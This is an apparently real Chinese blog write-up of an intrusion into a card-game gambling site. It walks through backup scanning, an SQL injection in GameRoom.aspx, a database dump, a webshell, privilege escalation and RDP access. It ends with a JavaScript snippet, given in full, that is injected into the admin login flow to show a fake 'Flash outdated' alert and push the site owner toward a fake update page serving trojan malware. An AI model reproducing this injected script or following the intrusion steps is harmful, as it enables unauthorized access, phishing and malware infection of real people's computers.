背景
![](https://img.haomeiwen.com/i12653063/ba867f678677c587.png)
背景简单信息收集
![](https://img.haomeiwen.com/i12653063/a874bc4b0b8d184d.png)
外网开放了两个web系统,80端口302跳转到app下载站,暂不考虑
9999端口:
![](https://img.haomeiwen.com/i12653063/ee15ed01fac0b162.png)
.net+sqlserver+windows
将这个系统放到fofa上搜搜使用同一套系统的ip
![](https://img.haomeiwen.com/i12653063/de372dc7888786e1.png)
PS:兄弟萌答应我下次fofa截图一定要把Content-Length: xxxx 打码好吗,每次都通过这个方式爆菊屡试不爽。
将这40多个站脱下来 批量扫一波备份先
![](https://img.haomeiwen.com/i12653063/ff5e10586adfae37.png)
拿到备份源码
![](https://img.haomeiwen.com/i12653063/59017aa42116ad0f.png)
api = 接口文件源码
Aw_Manager = 后台管理系统源码
经过长达五分钟的读代码,发现其api文件夹的GameRoom.aspx文件下的Page_Load方法存在一处sql注入
![](https://img.haomeiwen.com/i12653063/d713b265bab4a375.png)
![](https://img.haomeiwen.com/i12653063/dc5f08953430f7af.png)
注入上线
![](https://img.haomeiwen.com/i12653063/90fa509b7b850f1d.png)
脱库进后台
![](https://img.haomeiwen.com/i12653063/6ca2798f2aee06ca.png)
问题不大 利用注入写的shell执行update语句
![](https://img.haomeiwen.com/i12653063/26997f45f20b7520.png)
进后台
![](https://img.haomeiwen.com/i12653063/5bb6a16ecff5aad3.png)
各种玩法看的我眼花缭乱
![](https://img.haomeiwen.com/i12653063/7249f44a4aa3122a.png)
登录后台 900+玩家 均为微信登录的该棋牌游戏
![](https://img.haomeiwen.com/i12653063/e7ab82eaa05aff38.png)
网站搭建者ip归属上海松江区(电信) 判断是家庭路由器外网ip 无溯源价值
登录RDP
烂土豆提权+通过注册表查询rdp端口被更改为39456
![](https://img.haomeiwen.com/i12653063/4147a93358dad422.png)
RDP登上去
![](https://img.haomeiwen.com/i12653063/5cc05b17aed1ae80.png)
flash钓鱼
在后台登陆成功后跳转的文件插入跳转js 跳转到事先准备好的假的flash更新页面
事先准备:免杀马一只 flash假域名一个(最好是包含有"flash"的字样)
<script>window.alert = function(name){var iframe = document.createElement("IFRAME");iframe.style.display="none";iframe.setAttribute("src", 'data:text/plain,');document.documentElement.appendChild(iframe);window.frames[0].window.alert(name);iframe.parentNode.removeChild(iframe);};alert("您的FLASH版本过低,请尝试升级后访问改页面!");window.location.href="https://www.baidu.com";</script>
效果:
输入账号密码登录
![](https://img.haomeiwen.com/i12653063/78a6c2e8b6c3c523.png)
登录成功 弹框"您的FLASH版本过低,请尝试升级后访问改页面!",只能点击"确定"
![](https://img.haomeiwen.com/i12653063/53227c80cbbd8d59.png)
点击"确认"跳转到事先伪造的flash更新页面网站,诱导该棋牌所有者下载点击
![](https://img.haomeiwen.com/i12653063/a874804ede0e8ac9.png)
下载安装好我这边随即上线,取得对方PC控制权,并删除之前插入的跳转JS
(后续如何,下回分解)
网友评论